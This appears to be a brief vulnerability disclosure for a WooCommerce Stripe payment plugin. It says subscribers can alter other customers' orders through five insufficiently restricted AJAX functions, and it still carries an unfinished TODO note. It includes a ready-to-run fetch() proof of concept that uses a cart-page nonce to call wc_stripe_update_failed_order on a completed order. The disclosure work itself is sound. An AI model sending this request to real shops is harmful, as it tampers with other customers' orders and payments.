The plugin does not properly restrict users from making a certain set of changes to other customers’ orders. TODO: ADD link to Patchstack’s post instead of H1
Affected functions:
create_payment_intent_ajax
update_payment_intent_ajax
save_upe_appearance_ajax
update_order_status_ajax
update_failed_order_ajax
As a subscriber, go to the cart page (ie https://example/cart/) and grab the updateFailedOrderNonce nonce, then perform the below request (42 being a Completed Order ID)
fetch("/cart/?wc-ajax=wc_stripe_update_failed_order", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'order_id=42&_wpnonce=NONCE&intent_id=1',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));